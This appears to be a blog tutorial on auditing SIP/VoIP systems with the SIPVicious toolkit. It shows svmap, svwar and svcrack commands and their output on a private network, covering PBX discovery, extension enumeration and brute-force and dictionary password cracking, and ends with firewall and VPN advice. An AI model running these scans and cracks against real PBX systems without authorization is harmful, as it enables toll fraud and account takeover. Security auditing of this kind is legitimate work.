VoIP systems becoming increasingly popular, attracted people are not only legitimate users that are looking to use it in their business but those who would like to make free calls at other people’s expense. SIP devices are often attacked, with the intent of finding the username/password of accounts on that device.
VoIP attacks are found over misconfiguration or problems while implementing the PBX system. For testing these vulnerabilities we can use SIPVicious which is a set of tools that can be used to audit SIP based VoIP systems. It consists of five tools:
- svmap – this is a sip scanner. Lists SIP devices found on an IP range
- svwar – identifies active extensions on a PBX
- svcrack – an online password cracker for SIP PBX
- svreport – manages sessions and exports reports to various formats
- svcrash – attempts to stop unauthorized svwar and svcrack scans
This set of tools is written in Python and can be used on different operating systems. To better understand the way it works we can use the following scenarios:
– Running svmap to look for SIP phones:
box $ ./svmap.py 192.168.1.1/24
| SIP Device | User Agent |
| 192.168.1.111:5868 | Asterisk PBX |
| 192.168.1.112:5060 | unknown |
Here we can find an Asterisk PBX server detected on 192.168.1.111.
- Running svwar with default options on the target Asterisk PBX, these accounts can be used for calling:
box $ ./svwar.py 192.168.1.111
| Extension | Authentication |
| 202 | reqauth |
| 203 | reqauth |
| 200 | reqauth |
| 201 | noauth |
There are 4 extensions located, from 200 through 203 and 201 does not require authorization while the rest requires authorization.
- Using svcrack with the optimization enabled can help in discovering number based password as it just tries three-digit number combinations in order until it finds the password.
box $ ./svcrack.py 192.168.1.111 –u 201
| Extension | Password |
| 201 | 201 |
Password for extension 201 is 201, as shown above. To see how the attack works we can use –vv as follows: svcrack.py 192.168.1.111 –u 201 –vv .and the screen will display what combination it is trying.
- The cracker can also use a dictionary file full of possible passwords.
box $ ./svcrack.py 192.168.1.111 –u 203 \ -d dictionary.txt
| Extension | Password |
| 203 | ascript |
If you want to secure your VoIP/SIP, you need to start by setting the Firewall level to allow access for only a specific IP group and add the list of static IP addresses that are going to use the VoIP. If you are working remotely it will be also important to enable VPN for authenticating and encrypting your connection.
make sure you subscribe to my RSS feed!